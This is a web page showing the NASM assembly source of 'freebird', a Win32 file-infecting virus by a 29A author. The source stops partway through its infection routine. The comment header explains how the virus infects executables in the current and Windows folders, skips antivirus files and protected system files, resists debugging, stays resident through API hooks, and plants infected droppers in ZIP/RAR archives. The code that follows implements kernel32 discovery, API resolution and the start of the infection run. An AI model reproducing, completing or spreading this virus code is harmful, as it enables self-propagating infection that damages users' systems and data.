?? 29a-7.006
字號:
;
; freebird
; Coded by Bumblebee
;
; This is the source code of a VIRUS. The author is in no way
; responsabile of any damage that may occur due its usage.
;
; Some comments:
;
; That's a win32 per-process resident and direct action EPO virus.
;
; It infects only files that have any import from kernel32.dll module
; because this import is used to retrieve k32 address (and needed API).
; It requires API to go back host (restore patched bytes into host code
; section). It won't modify the EP in the PE header, instead patches the
; host code inserting a jmp to the virus. Is not the ultimate EPO but
; works and it's very easy to code, better than nothing :)
;
; It updates the PE checksum of infected PE files using imagehlp.dll
; API. If this API is not available, it still infects (checksum is zero).
;
; It does self integrity check with CRC32. That's a simple but effective
; anti-debug trick and keeps virus pretty safe of hex hacking.
;
; Uses size padding as infection sign.
;
; It won't infect most of av soft looking for the usual stringz in the
; name of the disposable victim (AV, DR, SP, F-, AN, VE, CL, ON).
;
; Has a run-time part that will affect win32 PE files with EXE ext into
; current and windows folders. It skips system protected files (SFC).
; Infecting files into windows folder helps the virus to spread with the
; simple direct action schema. If that fails (due system protected files),
; then the per-process part is there.
;
; It uses kinda mutexes to avoid overload the system with the run-time
; part. Due it uses shared memory by name as mutex, the name is random
; from serial number of c:\ drive and results from CPUID instruction ;)
;
; That name is used to uncompress a dropper and infect it. This file
; will be added to ZIP/RAR archives found in current folder. It will
; skip archives where 1st item is README.EXE (to avoid re-infection).
; It inserts the droper at the begining of the archives instead of
; appending the infected file to the end. Archive infection is a bit
; unoptimized O:) but quite clear to understand it.
;
; Per-process residence is performed as explained in an article released
; in this e-zine. I hook to check for directory changes: PostQuitMessage
; from USER32.DLL.
;
; It will get the needed API using GetProcAddress. And uses SEH to
; avoid crash, it hangs the process when a fatal error occurs (eg. if
; it cannot get the APIs to patch host code, it won't be able to go
; back host). At least won't appear an screen of death ;)
;
; Well, it's a neat virus. That was funny to code, even most parts are
; quite standard. I think that's the 2nd time i don't use crc32 for
; imports (the first one was win95.bumble, my 1st win appender), and is
; just due i was bored of the same crc32 code ever, and 2 facts:
; av stop study of viruses and... who cares with virus size? ;)
;
; I've developed it under win2k and tested under win98. That means it runs
; under windows 2000 without any problem (i cannot say the same about my
; previous 'win32' stuff). You only will notice it if thou get infected under
; such system ;)
;
; Finally i must say i'm in love with NASM, mainly due i have only this
; asm installed (fuck, and it fits in a single floppy: NASM+ALINK+DOCS+LIBS).
;
; Yes, it's Freebird from Lynard Skynard song. Oh Lord, I can't change ;)
; Try to find this song and listen it reading this lame source and, at least
; and may be not at last, you'll listen good music.
;
; That's all. The source code is pretty clear, but we're living bad times
; for the vx. May be this bug is only interesting for a small group of vxers:
; those that are experienced but still can learn something from the bee.
;
; I'm not used to greet ppl, but since i'm lost in combat... here follow
; some:
;
; Perikles: I miss you, i'll try to met you more often (use fweeder
; damnit, don't be afraid of vb huehe)
; Ratter: Seems now i'm newbie at your side... keep on rocking man
; Xezaw: We need young blood here... Metele canya pedacho gay!
; VirusBuster: Too much marulo arround here, uhm XD
; Mental Driller: You're the master, don't fool saying is matter of time
; Super: Looking forward to see that .NET shit, and your ring0 tute?
; TCP: Congratulations (he got married?)
; Vecna: Hey favelado, te veo flojo. Para cuando el fin del mundo?
; 29Aers: You're all alone...
;
; And big cheers to other ppl i used to talk to and now i cannot due i'm
; in the shadows: Yello, Clau, f0re, Zert, Slow, soyuz, TheVoid, Sheroc,
; Tokugawa, Evul, Gigabyte, Wintermute, Malware (where are you?), Griyo,
; Roadkill, Black Jack, star0, Rajaat, ... i cannot remember you, sorry =]
;
;
; If you wanna contact with me, ask someone that can find me.
;
; - main.asm BOF -
[extern ExitProcess]
[segment .text]
[global main]
main:
lea esi,[fakeHost] ; setup fake 1st gen
lea edi,[epobuffTMP]
mov ecx,5
rep movsb
lea edx,[fake_import]
mov [__imp__],edx
mov eax,400000h
mov [baseAddr],eax ; def base addr
lea esi,[vBegin]
mov edi,vSize-4
call CRC32
mov [myCRC32],eax
jmp ventry
fake_import dd 077e80000h ; developed under win2k
;
; Since win doesn't implement code protection (via segment, thus under intel
; arch the only way to do it coz pages don't have code/data attrib), that's
; a nice way to 1st gen without external PE patcher.
;
[segment .data]
ventry:
vBegin equ $
push eax ; room for ret addr
pushad
pushfd
call getDelta
lea esi,[vBegin+ebp]
mov edi,vSize-4
call CRC32 ; integrity check
mov ecx,[myCRC32+ebp]
sub ecx,eax
jecxz mycrc32ok
jmp $
mycrc32ok:
lea edi,[startUp+ebp] ; setup return
lea esi,[infectTMP+ebp] ; stuff saved in
add ecx,infectTMPlen ; infection with anti-debug
rep movsb ; (ecx must be zero at this
; point)
mov edx,12345678h
__imp__ equ $-4
mov esi,[reloc+ebp]
lea eax,[vBegin+ebp]
sub esi,eax ; this virus supports relocs
add [baseAddr+ebp],esi ; fix base addr (reloc)
add [hostEP+ebp],esi ; fix host entry point
add edx,esi ; use import to find
mov edx,[edx] ; k32 base address
xor eax,eax
call seh
jmp $ ; if we're not able to
; locate k32 we cannot
; get APIs and jmp back
; host is not possible
;
; Some stringz for the avers
;
db "[ FREEBIRD: I make birds of mud and I throw them to fly ]"
seh:
push dword [fs:eax]
mov dword [fs:eax],esp
and edx,0fffff000h ; simple k32 scan
add edx,1000h
findK32BaseAddrLoop:
sub edx,1000h
cmp word [edx],'MZ'
jne findK32BaseAddrLoop
movzx eax,word [edx+3ch]
cmp edx,dword [eax+edx+34h]
jne findK32BaseAddrLoop
mov [kerneldll+ebp],edx
xor eax,eax ; remove SEH frame
pop dword [fs:eax]
pop eax
scanKerneldll:
mov ebx,12345678h ; get GetProcAddress
kerneldll equ $-4
mov edi,ebx
mov esi,edi
add esi,3ch
lodsd
add eax,edi
xchg eax,esi
mov esi,dword [esi+78h]
add esi,ebx
add esi,1ch
lodsd
add eax,edi
mov [address+ebp],eax
lodsd
add eax,edi
mov [names+ebp],eax
lodsd
add eax,edi
mov [ordinals+ebp],eax
xor edx,edx
lea esi,[GetProcAddress+ebp]
mov ecx,GetProcAddresslen
searchl:
push ecx
push esi
mov edi,[names+ebp]
add edi,edx
mov edi,[edi]
add edi,ebx
rep cmpsb
je fFound
add edx,4
pop esi
pop ecx
jmp searchl
fFound:
pop esi
pop ecx
shr edx,1
add edx,[ordinals+ebp]
movzx ebx,word [edx]
shl ebx,2
add ebx,[address+ebp]
mov ecx,[ebx]
add ecx,[kerneldll+ebp]
getAPI:
mov [_GetProcAddress+ebp],ecx
lea esi,[API0+ebp] ; now get APIs
getAPILoop:
push esi
xor eax,eax
lodsb
push eax
add esi,4
push esi
push dword [kerneldll+ebp]
call dword [_GetProcAddress+ebp]
pop ecx
pop esi
mov [esi+1],eax
add esi,ecx
jecxz getAPILoopDone
jmp getAPILoop
getAPILoopDone:
xor eax,eax
push eax
push eax
push eax
push eax
lea esi,[serialNum+ebp]
push esi
mov [esi],eax ; fix string
push eax
push eax
lea esi,[drive+ebp]
push esi
call dword [_GetVolumeInformationA+ebp] ; get serial number of
or eax,eax ; c: drive
jnz randomOk
mov dword [serialNum+ebp],12345678h ; that's not random!
randomOk:
xor eax,eax
inc eax
cpuid ; mutex depends on CPU
or eax,edx
xor dword [serialNum+ebp],eax ; fuck you avers! hueheh
; random? XD
and dword [serialNum+ebp],0f0f0f0fh ; build rnd string
or dword [serialNum+ebp],"aaaa"
; why that pseudo random? we don't want the avers create
; their artificial mutex to fool the virus, do we?
; check our mutex to avoid overload the system with
; several instances of the virus infecting arround
; all at the same time...
xor eax,eax
lea esi,[serialNum+ebp]
push esi
push dword 1024
push eax
push dword 4
push eax
dec eax
push eax
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near failedToLoadDll
mov [mutexHnd+ebp],eax
call dword [_GetLastError+ebp] ; already there?
cmp eax,0b7h
je near closeMutex
lea esi,[imagehlpdll+ebp] ; load imagehlp dll
push esi
call dword [_LoadLibraryA+ebp]
or eax,eax
jz near closeMutex
mov [_imagehlpdll+ebp],eax
lea esi,[CheckSumMappedFile+ebp] ; get API for PE checksum
push esi
push eax
call dword [_GetProcAddress+ebp]
mov [_CheckSumMappedFile+ebp],eax
lea esi,[sfcdll+ebp] ; load sfc dll
push esi
call dword [_LoadLibraryA+ebp]
mov [_sfcdll+ebp],eax
or eax,eax
jz near noSfc
lea esi,[SfcIsFileProtected+ebp] ; get API to avoid sfc
push esi
push eax
call dword [_GetProcAddress+ebp]
noSfc:
mov [_SfcIsFileProtected+ebp],eax
; hey bumble, remember that must be before any infection!
call setupPerProcess ; setup per-process
; hooks
; now the run-time part
lea esi,[path0+ebp]
push esi
push dword 260
call dword [_GetCurrentDirectoryA+ebp]
or eax,eax
jz endRuntimePart
push dword 260
lea esi,[path1+ebp]
push esi
call dword [_GetWindowsDirectoryA+ebp]
or eax,eax
jz endRuntimePart
mov ecx,eax ; if we're yet into
lea esi,[path0+ebp] ; windows folder, avoid
lea edi,[path1+ebp] ; infect more files
rep cmpsb
je endRuntimePart
call scandirpe ; infect current folder
lea esi,[path1+ebp]
push esi
call dword [_SetCurrentDirectoryA+ebp]
or eax,eax
jz endRuntimePart
call scandirpe ; affect windows folder
lea esi,[path0+ebp] ; go back home
push esi
call dword [_SetCurrentDirectoryA+ebp]
call findArchives ; self explanatory XD
endRuntimePart:
mov eax,[_sfcdll+ebp] ; free it only if loaded
or eax,eax ; (of coz hehe)
jz sfcNotLoaded
push dword [_sfcdll+ebp]
call dword [_FreeLibrary+ebp]
sfcNotLoaded:
push dword [_imagehlpdll+ebp] ; good guys release the dlls
call dword [_FreeLibrary+ebp]
closeMutex:
push dword [mutexHnd+ebp] ; close the 'mutex'
call dword [_CloseHandle+ebp]
failedToLoadDll:
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -